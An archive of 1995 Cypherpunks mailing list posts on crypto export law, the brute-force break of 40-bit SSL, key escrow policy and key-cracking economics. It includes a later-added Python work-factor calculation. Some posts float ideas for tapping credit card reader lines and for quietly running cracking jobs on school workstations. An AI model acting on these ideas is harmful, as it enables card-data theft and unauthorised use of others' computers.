weeks later (pretty fast by government standards to be honest) and
asked me some questions.  I answered as honestly as I could ...

***	The RSA was built into the system and, although it could be
extracted and used for encryption, as shipped, it was only used for
authentication.  It literally throws away one of the keys during key
generation so that it is truly a one-way trap door.  It would take a
substantial effort by a knowledgeable programmer to convert it into a
workable RSA for encrypting large files, and as implemented, it is only
good for authentication.

***	The inbuilt encryption schemes are relatively easily broken and
are designed only to prevent automated attack by viruses that try to forge
checksums and other such things.

***	The message digest facility is pretty good, but it can only be
used for the authentication process, so it is useless as an encryption
system.

***	The external encryption hook includes no worthwhile encryption
scheme, but it can easily be converted for this use if you have your own
encryption technology.

They responded that as far as they were concerned, I could go ahead and
ship it overseas, sent me a letter to that effect (which I have in the
files somewhere just in case), and off it went.  All further development
of the encryption side was done overseas from that point forward to keep
me from having to go through ITAR again.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Thu, 17 Aug 95 18:44:23 PDT
To: cypherpunks@toad.com
Subject: Re: Silly technical question from a non-technical person
In-Reply-To: <9508172055.AA15978@spirit.aud.alcatel.com>
Message-ID: <VAA11227.199508180143@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9508172055.AA15978@spirit.aud.alcatel.com>, Daniel R. Oelke writes:
[...]
>I know someone who *used* to be in the ATM transaction 
>business, but is no longer.  Is the code from a credit card
>reader DES encrypted?  We could possibly "tap" the serial
>port between the reader and the modem and get a byte 
>stream in that manner.... but then again, my knowledge
>of those beasts is pretty limited.

At least some of the cc-reader protocols are not encrypted (but
they are rather cryptic on their own :-).  I don't know how common
this is 'tho.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 17 Aug 95 21:59:20 PDT
To: jim@acm.org
Subject: Re: I need exportable crypto revisited.
Message-ID: <9508180456.AA08040@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain



But don't forget the International Cryptography Experiment, (ICE).
You can read about it in a file available from TIS.  They're trying
to evolve something with pluggable authentication and encryption
that will pass ITAR.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 17 Aug 95 20:11:35 PDT
To: "George P. Magiros" <libgpmx@gsusgi2.Gsu.EDU>
Subject: Re: use PGP for http encryption instead!
In-Reply-To: <199508180239.WAA27731@gsusgi2.Gsu.EDU>
Message-ID: <Pine.ULT.3.91.950817220822.26415C-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 17 Aug 1995, George P. Magiros wrote:

> i don't mean to be extremely brash, but couldn't one use PGP to provide
> encrypted communication with the web.
> granted initially everyone with a browser would need there own key to
> communicate in an encrypted way - at least until such keys could be
> generated on the fly.
> 
> since the http "client" format resembles rfc821 message headers and a body,
> one could easily use a "hal" remailer type "Encrypted: PGP" header line
> plus hash marks "::" to reassemble a compatible http client command.
> The same could be done on the server side.

As far as I understand, no.  

1)  you can't export PGP.
2)  even though it's out there, making software with hooks for PGP is 
    equally bad in the eyes of the NSA.  There wa some talk on 
    alt.internet.media-coverage (and the thread is being crossposted all 
    over the place) about mosaic having to remove PGP hooks before the 
    NSA would let them export.
3)  Frankly, I don't necessarily trust something that plays with my 
    personal stuff if I can't access the source code to make sure it's not 
    messin' with it :-)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMDPo2DokqlyVGmCFAQH9wAP9EB9rdvCAu32ULCUqO6YE4eKSpn4499n8
S/FFeSD7QqRKRzDFs/FsWPqVJfgeD05QJRysrCBRwZTh8//jXBaiLJ6IhqG18YsE
oQq7bFXTEk9BmFcjGljhaLYX548qSmkZCFyBa5LNG96f4Lpj3kOE02BmWNRcCT3Y
U7kCk1btxcY=
=RVSJ
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++) ULU++ P+ L++ E---- W+(-) N++++ o+ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G+++++ e++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 17 Aug 95 22:29:49 PDT
To: cypherpunks@toad.com
Subject: Legality of the ITARs
Message-ID: <ac5971dd190210041167@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I'm not an expert on ITARs, but I'll pass along something I heard about a
year or year and a half ago.

At 4:58 AM 8/18/95, Lucky Green wrote:

>In article <199508180030.RAA04988@mycroft.rand.org>, jim@acm.org (Jim
>Gillogly) wrote:
>
>>> "Perry E. Metzger" <perry@piermont.com> writes:
>>> If you have hooks for arbitrary encryption, you will find it to be
>>> virtually impossible to export the product.
>>
>>That's my understanding also (as I told him in e-mail) but I haven't found
>>any legal justification for it.
>
>You might as well stop looking, because there isn't any. The brownshirts
>have long ago decided that the law means what they say it does. Welcome to
>reality.

Lawyers within NSA are apparently of the same opinion, that the ITARs would
not stand up to a court test.

Carl Nicolai, the inventor of the "PhasorFone," whose case was described in
Bamford's 1982 "The Puzzle Palace," once called me up to tell me that he
and his lawyer were allowed to view, but not copy, files on the ITAR issue.
Some memos they came across from Agency lawyers warned that any ITAR court
case would likely see the ITARs overturned.

(I passed this information on to Phil Karn a year or so ago, as he was
starting his suit to get Schneier's stuff approved for export. I later saw
a note from Lee Tien and/or John Gilmore saying they had gotten similar
documents under an FOIA they did. Maybe these were the same documents Carl
Nicolai saw, maybe not.)

On the other hand, these comments came from an era of judicial liberalism,
not the current era in which the Supremes uphold random searches of bus
passengers, of high school students, etc., when "good reasons exist." It
may be that the current Supremes would uphold the ITARs.

Wait until furrin terrorists are found to be using exported crypto for some
nefarious plot...

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George P. Magiros" <libgpmx@gsusgi2.Gsu.EDU>
Date: Thu, 17 Aug 95 19:39:25 PDT
To: cypherpunks@toad.com
Subject: use PGP for http encryption instead!
Message-ID: <199508180239.WAA27731@gsusgi2.Gsu.EDU>
MIME-Version: 1.0
Content-Type: text/plain


i don't mean to be extremely brash, but couldn't one use PGP to provide
encrypted communication with the web.
granted initially everyone with a browser would need their own key to
communicate in an encrypted way - at least until such keys could be
generated on the fly.

since the http "client" format resembles rfc821 message headers and a body,
one could easily use a "hal" remailer type "Encrypted: PGP" header line
plus hash marks "::" to reassemble a compatible http client command.
The same could be done on the server side.

-george
---
libgpmx@gsusgi2.gsu.edu  (finger for PGP public key or use MIT keyserver)
George P. Magiros         Georgia State University Pullen Library 
PGP fingerprint of 59069039:  D6 76 D4 FC 9B 25 6E DD  DD 81 58 06 7B CD 03 AE




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 17 Aug 95 21:08:08 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Export policy change
In-Reply-To: <9508180348.AA20354@sulphur.osf.org>
Message-ID: <Pine.ULT.3.91.950817230618.26923A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 17 Aug 1995, Rich Salz wrote:

> Just heard on the 11:30pm NPR news update.  The Clinton Administration
> has changed the crypto export policy.  You will now be allowed to
> export strong crypto, provided it is a key escrow system.  The
> reporter (Dan Charles?) said something like anyone can hold the keys,
> as long as they will be made avail when presented with a court order.
> He also said, US citizens will still be able to use strong crypto
> without key escrow internally.  Terrorists and drug pushers were given
> as "reasons."

Ok, let's escrow our keys with Julf :-)

Seriously, there might be a market for somebody to become a professional 
escrow agent....

(tongue partially in cheek)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMDP2ITokqlyVGmCFAQF/JgP+Ok367e94N5E/b9IpokHpYlyFydgPzQbO
7EDzobygI3HESHro12mEYwadIShcoRRCXdMiPcuCU1G9tmDU2DoRamqIbU4dFDRk
5kEuwkJYQD+w3d+0Heebd/YwH+zpZvnlIawby1pAAPVPpzHhGkb0lFBymqrbg952
nLMzvcWt6jM=
=TPoy
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++) ULU++ P+ L++ E---- W+(-) N++++ o+ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G+++++ e++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 17 Aug 95 20:29:31 PDT
To: "George P. Magiros" <libgpmx@gsusgi2.gsu.edu>
Subject: Re: use PGP for http encryption instead!
In-Reply-To: <199508180239.WAA27731@gsusgi2.Gsu.EDU>
Message-ID: <199508180329.XAA00456@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"George P. Magiros" writes:
> i don't mean to be extremely brash, but couldn't one use PGP to provide
> encrypted communication with the web.

You ought to read up on S-HTTP, the expert on said protocol being our
very own Eric Rescorla...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sameer R. Manek" <seawolf@challenger.atc.fhda.edu>
Date: Thu, 17 Aug 95 23:46:33 PDT
To: John Pettitt <jpp@software.net>
Subject: Re: SSL challenge -- broken !
In-Reply-To: <Pine.3.89.9508171031.E16021-0100000@www2.software.net>
Message-ID: <Pine.SGI.3.90.950817233856.10351A-100000@challenger.atc.fhda.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 17 Aug 1995, John Pettitt wrote:
> On Wed, 16 Aug 1995, Damien Doligez wrote:
> > SSL challenge -- broken
> >               It fails on the second count.  Don't trust your credit
> >   card number to this protocol.
> 
> Huh?  So you run on 120 workstations worth how much?  to steal a credit
> card number worth how much?  Get real - there are hundreds of ways
> to get credit card numbers that cost less.  The idea is to make
> breaking SSL less attractive than dumpster diving not to make it
> impossible.   I'll lay odds that I could get the credit card number
> of *any* individual in the US in less elapsed time and with nothing
> more than a $1000 windoze machine, a telephone and a modem.
> 
I think the point here is that it's not safe to send credit cards
over the net and just like in rl, you've got to protect yourself by keeping
a close eye on your credit card transactions. And to prove to
our governments that RSA40 isn't 'good enough' any more.

On the other hand getting access to 120 workstations shouldn't be too
difficult for any system admin. Take my school for example, I could
run the program on some 100 odd SGI Indy workstations, 2 SGI challenge S's
and a challenger DM (2cpus) along with 2 DEC Alphas

As long as I set it to have a high nice value, nobody would notice, or even
mind.

________________________________________________________________________
Sameer Manek                Seawolf@challenger.atc.fhda.edu         
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 17 Aug 95 20:48:23 PDT
To: cypherpunks@toad.com
Subject: Export policy change
Message-ID: <9508180348.AA20354@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Just heard on the 11:30pm NPR news update.  The Clinton Administration
has changed the crypto export policy.  You will now be allowed to
export strong crypto, provided it is a key escrow system.  The
reporter (Dan Charles?) said something like anyone can hold the keys,
as long as they will be made avail when presented with a court order.
He also said, US citizens will still be able to use strong crypto
without key escrow internally.  Terrorists and drug pushers were given
as "reasons."
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 18 Aug 95 00:53:53 PDT
To: shank@netscape.com (Peter Shank)
Subject: Re:  Netscape security
Message-ID: <199508180750.AAA27087@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Shank - I'm a bit disappointed by your posting about the RC4-40 crack.

>Late Tuesday evening a person from France posted a news article to the
>hacker community claiming success at decrypting a single encrypted message
(You could have used his name, and use of the term "hackers" to the press
tends to be interpreted as a negative...)  Anyway, as to content:

>What this person did is decrypt one encrypted message that used RC4-40 for
>encryption. He used 120 workstations and two parallel supercomputers for 8
>days to do so.
"Two" parallel supercomputers?  You can't really call the Encore Multimax
or the Sequent B8000 a supercomputer - both of them together are slower than
the HP workstation.  The KSR gets closer to supercomputer territory, but
it's only cracking keys about six times as fast as the faster DEC Alpha
(which Damien only had one of); it increased his horsepower about 20% for
two days.

Now, I can see calling a MasPar a "parallel supercomputer"; another effort
at the SSL challenge got the answer about 2 hours before Damien's did,
and used about 4 days of spare time on the MasPar.  Last time I looked,
a MasPar was selling for about $150K, though I don't know how big the one
used on SSL was.  At that price, you could have your own for ~$500/day,
and ripping off $2000 on a credit card isn't tough in today's automated world.
Next year - computer time costs half as much.

Yes, it's still cheaper to get good credit card numbers by scamming carbons
at a mall clothing store or yuppie restaurant, but computer networks let
criminals run their scams wholesale, putting the public at risk both from
organized criminals with their own equipment and any dishonest college
student or office worker who's got a roomful of idle computers to use at night.

Trading off the cost of breaking security vs. the value to be gained is
a good start - lots of people have $2000 of credit limit left on their cards,
and most people have more than $0 left.


> This level of security has been available in the
>U.S. versions of our products since last April. Because of export controls
>it has not been available outside the U.S. We would appreciate your support
>in lobbying the U.S. government to lift the export controls on encryption.
>If you'd like to help us lobby the government send email to
>export@netscape.com.

Thanks for working on this!

                                Bill Stewart

==================== The list of computers ===========================
type                  speed (keys/s)    number     notes
--------------------------------------------------------
DEC (alpha)           18000-33000        34
DEC (MIPS)            2500-7500          11
SPARC                 2000-13000         57
HP (HPPA/snake)       15000              3
Sony (R3000)          1100-4000          3
Sun 3                 600                2
Sequent B8000         100 x 10           1         (1)
Multimax (NS532)      600 x 14           1         (1)
KSR                   3200 x 64          1         (1) (2)

Notes:
1.  These are multiprocessor machines
2.  The KSR spent only about 2 days on this computation.

The total average searching speed was about 850000 keys/s,
with a maximum of 1350000 keys/s (1150000 without the KSR).
====================================================================
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 18 Aug 95 00:53:55 PDT
To: Lile Elam <lile@art.net>
Subject: Re: (event 8/17)  panel on the Net:Privacy, Security, and Parental Control
Message-ID: <199508180751.AAA27094@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:10 PM 8/14/95 -0700, you wrote:
>Perhaps some of us should be here to keep things in perspective.

Thanks; it was an interesting panel.  I missed the first half hour,
since traffic was appalling :-), but got to the rest; maybe an hour of
panel discussion and 15 minutes of organized q&a, then wine&cheese.  
Just about everybody was concerned about pornography on the net, and thought
that the government had no clue what they were doing and shouldn't be
regulating it; most thought that the whole issue was really a smokescreen
for the government wanting to regulate the nets and especially interstate
commerce
("Hmm, we tried scaring everybody about terrorists on the net, that fizzled,
let's scare them about porn and their kids - that always works!").  
About half the panel had kids between 4 and 15.

Lots of concern about media concentration and how this is
currently the only widely accessible medium for 1:N communications
so it's a target.  Some interesting discussions about changes in society
and our relationships with other people that come from net-style communications
and artificiality - Mark Slouka was mainly taking the side of "this is different
and I'm not sure I like it, and the fact that people are desperately seeking
community through this virtual stuff says our communities out in the real world
are probably having some real crises", with interesting thought behind it.

PGN brought in some RISKS stuff, including the how-rumors-spread dynamics;
he also talked a bit about cryptography (he's on that national policy review),
somewhat from the perspective of "it's an international problem and trying
to do things within national borders is ineffective" - I'm not sure he's
on our side here though he's at least clueful.

Dan Gillmor had some good perspectives on objectivity in reporting -
the news business knows it's not objective, and he's at least concerned
with trying to be fair and balanced and as quick as possible about
correcting mistakes, but then he edits the SJMerc business page so it's a
lot clearer what "mistakes" are than in, say, political reporting.

>>    * George Baldwin, California State University, Monterey Bay
George Baldwin is involved with the IndianNet project, putting things like
Native American artwork on the Web, including for sale.  He brought up some
cultural perspectives - a lot of people have been viewing it, but Native
Americans don't actually _buy_ much of it because they tend to view artwork
as personal
and want to know the artist and what it means to him/her, and the net doesn't
do that very well.  If you haven't heard of CSU Monterey Bay, it's opening RSN.

>>    * Bill Bauriedel, Stanford University
He's on an inter-university study to address things like how to do
on-line registration while preserving privacy (doesn't like export
laws at all.)
>>    * Dan Gillmor, San Jose Mercury News
>>    * Richard Gingras, Apple
Manages E-World and some network things.
>>    * Peter Neumann, SRI
>>    * Craig Newmark, Digital Threads
Used to wear plastic pocket protectors when he was younger :-)
Consults to big companies that need clues.
>>    * Mark Slouka, University of California, San Diego
One of the liberal arts types on the panel.  Either he or George Baldwin 
was talking about college students learning creative writing on MUDs and MOOs.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Thu, 17 Aug 95 15:55:33 PDT
To: cypherpunks@toad.com
Subject: Re: WANTED: anonymous remailer source code
Message-ID: <199508172255.AA02942@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Quazi sez:

: I'm interested in porting some remailer code to work on NT (most
: likely using NTMail as the smtp service). I'd like to be sure I'm
: starting my port from the most recent revisions, and the sources at
: the archive at berkeley seem a bit dated. Are they the latest sources?
: Are there more recent sources available somewhere?

Try ftp.hacktic.nl:/pub/remailer

--
Alex de Joode
Fear Uncertainty Confusion and Kaos, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 17 Aug 95 22:02:12 PDT
To: cypherpunks@toad.com
Subject: Re: I need exportable crypto revisited.
Message-ID: <199508180458.AAA11401@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199508180030.RAA04988@mycroft.rand.org>, jim@acm.org (Jim
Gillogly) wrote:

>> "Perry E. Metzger" <perry@piermont.com> writes:
>> If you have hooks for arbitrary encryption, you will find it to be
>> virtually impossible to export the product.
>
>That's my understanding also (as I told him in e-mail) but I haven't found
>any legal justification for it. 

You might as well stop looking, because there isn't any. The brownshirts
have long ago decided that the law means what they say it does. Welcome to
reality.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDQd8ioZzwIn1bdtAQGyEwF9HHGf5vVL0EbVt7RVrXwLlQQUGLF+nFEl
+KP+YB4/JYjjvE9G8By7RlezFhZF3Iy6
=MRsO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Limpert" <johnl@radix.net>
Date: Thu, 17 Aug 95 22:49:38 PDT
To: cypherpunks@toad.com
Subject: Cheap Brute Force Attacks
Message-ID: <199508180547.BAA15638@saltmine.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


The use of idle cycles on workstations or PCs for brute force attacks
made me think about the economics of this problem. How cheaply could
a massively parallel system be built for key cracking? Much of the
cost and complexity of current massively parallel systems is in
the inter-processor communications and memory systems. Why not build
a system with a large number of single chip processors (ROM/RAM/IO on
one chip) and a simple/slow/cheap communication bus? I'm assuming that
each processor can attack a small chunk of the keyspace without needing
any external support. One or more PC boards could be populated with
an array of cheap processors. There would be a master controller to
assign chunks of key space and check for results. It could also download
the software if it was to be stored in on-chip RAM. A PC board could
be designed that would provide 5V power, a shared serial I/O bus and
a wired-or interrupt for the microprocessors to signal the master
controller that a key has been cracked. What would be a good microprocessor
for this task? It would have to be cheap, reasonably low power with
lots of integer MIPS. A decent amount of on-chip RAM would allow the
software to be downloaded instead of being masked or burned into ROM.
1000 processors could be put into a relatively small box, let's say
10 boards each containing 100 single chip microprocessors. It shouldn't
cost more than $10-$20 per processor, about the same total cost as
one decent workstation ($10K-$20K).


--
John A. Limpert
johnl@Radix.Net
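
Added example, not part of any poster's message: the work-factor arithmetic behind the figures quoted in this thread (the machine list and search rates forwarded by Bill Stewart, his MasPar rental estimate, and John Limpert's 1000-processor box), plus the defender's question of how many key bits a given search rate demands. Function names are this example's own, and the cost-halving-per-year parameter is an assumption extrapolated from the remark "Next year - computer time costs half as much."

```python
SECONDS_PER_DAY = 86_400

# (machine type, low keys/s, high keys/s, machine count), copied from the
# "list of computers" table in Bill Stewart's message. Multiprocessor rows
# are expanded: 100 x 10, 600 x 14, 3200 x 64.
MACHINES = [
    ("DEC (alpha)", 18000, 33000, 34),
    ("DEC (MIPS)", 2500, 7500, 11),
    ("SPARC", 2000, 13000, 57),
    ("HP (HPPA/snake)", 15000, 15000, 3),
    ("Sony (R3000)", 1100, 4000, 3),
    ("Sun 3", 600, 600, 2),
    ("Sequent B8000", 100 * 10, 100 * 10, 1),
    ("Multimax (NS532)", 600 * 14, 600 * 14, 1),
    ("KSR", 3200 * 64, 3200 * 64, 1),
]

# Rates reported in the same message, in keys per second.
REPORTED_AVG = 850_000
REPORTED_MAX = 1_350_000
REPORTED_MAX_NO_KSR = 1_150_000


def aggregate_bounds(machines=MACHINES):
    """Lowest and highest possible combined rate if every machine ran at once."""
    low = sum(lo * count for _, lo, _, count in machines)
    high = sum(hi * count for _, _, hi, count in machines)
    return low, high


def search_days(key_bits, keys_per_sec, fraction=0.5):
    """Days needed to cover `fraction` of the keyspace.

    fraction=0.5 is the expected case for a uniformly random key,
    fraction=1.0 is the worst case (every key tried).
    """
    return fraction * 2 ** key_bits / keys_per_sec / SECONDS_PER_DAY


def per_chip_rate(target_keys_per_sec, chips):
    """Rate each chip must reach for `chips` of them to hit the target rate."""
    return target_keys_per_sec / chips


def rental_cost(days, dollars_per_day, years_out=0):
    """Cost of one search; assumes compute cost halves every year (assumption)."""
    return days * dollars_per_day / 2 ** years_out


def work_ratio(bits_a, bits_b):
    """How many times more keys a bits_a keyspace holds than a bits_b one."""
    return 2 ** (bits_a - bits_b)


def min_key_bits(keys_per_sec, horizon_days):
    """Smallest key length whose expected search time is at least horizon_days."""
    keys_in_horizon = keys_per_sec * horizon_days * SECONDS_PER_DAY
    bits = 1
    while 2 ** (bits - 1) < keys_in_horizon:  # 2^(bits-1) = half the keyspace
        bits += 1
    return bits


if __name__ == "__main__":
    low, high = aggregate_bounds()
    print(f"table bounds: {low:,} to {high:,} keys/s (reported max {REPORTED_MAX:,})")
    print(f"40-bit expected search at average rate: {search_days(40, REPORTED_AVG):.1f} days")
    print(f"40-bit worst case at average rate: {search_days(40, REPORTED_AVG, 1.0):.1f} days")
    print(f"1000-chip box must do {per_chip_rate(REPORTED_AVG, 1000):.0f} keys/s per chip")
    print(f"4 days at $500/day: ${rental_cost(4, 500):,.0f} per key")
    print(f"128-bit vs 40-bit keyspace: 2^{128 - 40} = {work_ratio(128, 40):.2e} times larger")
    print(f"bits needed to outlast 8 days at average rate: {min_key_bits(REPORTED_AVG, 8)}")
```

Run as a script, it shows that the reported average rate gives an expected 40-bit search of about 7.5 days, in line with the 8 days quoted, and that a 1000-chip box only needs about 850 keys/s per chip, not far above the 600 keys/s listed for a Sun 3, to equal the whole effort.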





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 17 Aug 95 23:14:19 PDT
To: cypherpunks@toad.com
Subject: Where is the key cracking farming software?
Message-ID: <199508180611.CAA11918@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

With all the talk about cracking SSL, where is the cracking software?
Somebody just offered me a six Pentium workstation, if I agree to give it a
"real workout". I'd like to be able to say: "Sure, will do."

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDQu2yoZzwIn1bdtAQF+iAF/WrvfsHBTRhh8fYfWENS0oxOUagl1GrBo
PMeo+yJOa7/CN5/pl0xQTFUdusijXqxO
=DiNO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 18 Aug 95 03:36:25 PDT
To: cypherpunks@toad.com
Subject: Key escrow agent
Message-ID: <9508181035.AA01820@all.net>
MIME-Version: 1.0
Content-Type: text


Management Analytics is proud to announce its key escrow agency.
We will escrow keys for only US$1 per key.  Please send your keys
to us along with your $1 check or money order.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 18 Aug 95 03:57:23 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Non-News Govt Announcement on Key Escrow
Message-ID: <199508181055.GAA23407@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim May writes:

<beginning snipped>

>any mandatory key escrow system is not only a
>massive infringement on the right of people to speak and communicate as
>they wish, it is also handing the keys to the Surveillance State to the
>likes of Bob Dole, Jesse Helms, Alonse D'Amato, Newt Gingrich, and William
>Bennett.

You left out Mr. Perot, who has a penchant for investigation [and even
"operations" ] with his own family, business & money, and has not ruled
out another run for the presidency this time.

Imagine this authoritarian statist in charge of the whole alphabet
of U.S. intelligence agencies run by *tax* money...
Chilling! [I would ordinarily make an "all ears" joke now.] <g>

...

On another subject, NPR announcement confirmed at 6:38AM today.
Key "escrow" with a private company [exact qualifications undefined,
but amenable to service of search warrants] but export of stronger
crypto now permitted. No U.S. key escrow for unexported cryptography
[yet]. <sigh>
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMDRvYm1lp8bpvW01AQFotwP+LITpSdGjRuyBdTqP7n70HrkmsMAPqeK0
MQgOVqbmDT4N8KwLP80UIkCIRqSBXFq4aOTEld+ImCRhN4ivfmAd332DaPbhCXS6
nvEJXfXli6KumaSMLQjmFRfIvcgAHz5Y7NELpHDnI+gjKgixWPEZd7/8r7eL3uhh
UUovA9OLiWk=
=LOEF
-----END PGP SIGNATURE-----
Regards, Jim Ray

"The important thing is not to stop questioning. Curiosity has its
own reason for existing. One cannot help but be in awe when he
contemplates the mysteries of eternity, of life, of the marvelous
structures of reality. It is enough if one merely tries to comprehend
a little of this mystery every day. Never lose a holy curiosity."
 -- Albert Einstein
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 18 Aug 95 04:22:20 PDT
To: cypherpunks@toad.com
Subject: NYT on Crypto Policy
Message-ID: <199508181122.HAA06682@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, August 18, 1995, pp. D1, D6.


   U.S. to Urge A New Policy On Software

   Attempt at Compromise On Scrambling of Data

   By John Markoff


   The Clinton Administration broke a year of silence on its
   data-scrambling policy yesterday by saying it would soon
   propose an alternative to the Government's so-called Clipper
   Chip system, which has been widely criticized by makers and
   users of computer technology.

   The Administration announcement is an attempt to reach a
